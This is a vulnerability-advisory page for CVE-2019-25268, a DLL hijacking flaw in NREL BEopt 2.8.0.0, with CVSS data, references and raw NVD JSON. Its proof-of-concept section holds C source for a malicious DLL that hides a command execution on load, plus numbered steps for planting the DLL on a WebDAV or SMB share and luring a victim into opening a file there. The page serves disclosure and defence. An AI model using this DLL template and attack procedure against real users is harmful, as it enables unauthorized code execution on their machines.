Security Vulnerability Report
CVE-2019-25268 CVSS 9.8 CRITICAL

CVE-2019-25268

Published: 2026-01-08 00:15:57
Last Modified: 2026-04-15 00:35:42

Description

NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. Attackers can exploit insecure library loading of sdl2.dll and libegl.dll by placing malicious libraries on WebDAV or SMB shares to execute unauthorized code.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NREL BEopt 2.8.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2019-25268 PoC - DLL Hijacking in NREL BEopt
# This PoC demonstrates how to create a malicious DLL for exploitation

import os

# Malicious DLL source code (for Windows x64)
dll_template = '''
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Create a backdoor connection or execute malicious payload
        WinExec("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt", SW_HIDE);
        // Or use system() for arbitrary command execution
        // system("calc.exe");
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
'''

# To exploit:
# 1. Create a malicious sdl2.dll or libegl.dll
# 2. Host the malicious DLL on a WebDAV or SMB share
# 3. Name the DLL to match what BEopt loads
# 4. Social engineer victim to open a BEopt file from the remote share
# 5. The malicious DLL will be loaded and executed

print("CVE-2019-25268 DLL Hijacking PoC")
print("Target: NREL BEopt 2.8.0.0")
print("Vulnerable DLLs: sdl2.dll, libegl.dll")
print("Attack vector: WebDAV/SMB share")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25268", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:57.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. Attackers can exploit insecure library loading of sdl2.dll and libegl.dll by placing malicious libraries on WebDAV or SMB shares to execute unauthorized code."}, {"lang": "es", "value": "NREL BEopt 2.8.0.0 contiene una vulnerabilidad de secuestro de DLL que permite a los atacantes cargar bibliotecas arbitrarias engañando a los usuarios para que abran archivos de aplicación desde recursos compartidos remotos. Los atacantes pueden explotar la carga insegura de las bibliotecas sdl2.dll y libegl.dll colocando bibliotecas maliciosas en recursos compartidos WebDAV o SMB para ejecutar código no autorizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": 
"NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019030108", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/158065", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/152043", "source": "[email protected]"}, {"url": "https://web.archive.org/web/20190915095657/https://beopt.nrel.gov/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5513.php", "source": "[email protected]"}]}}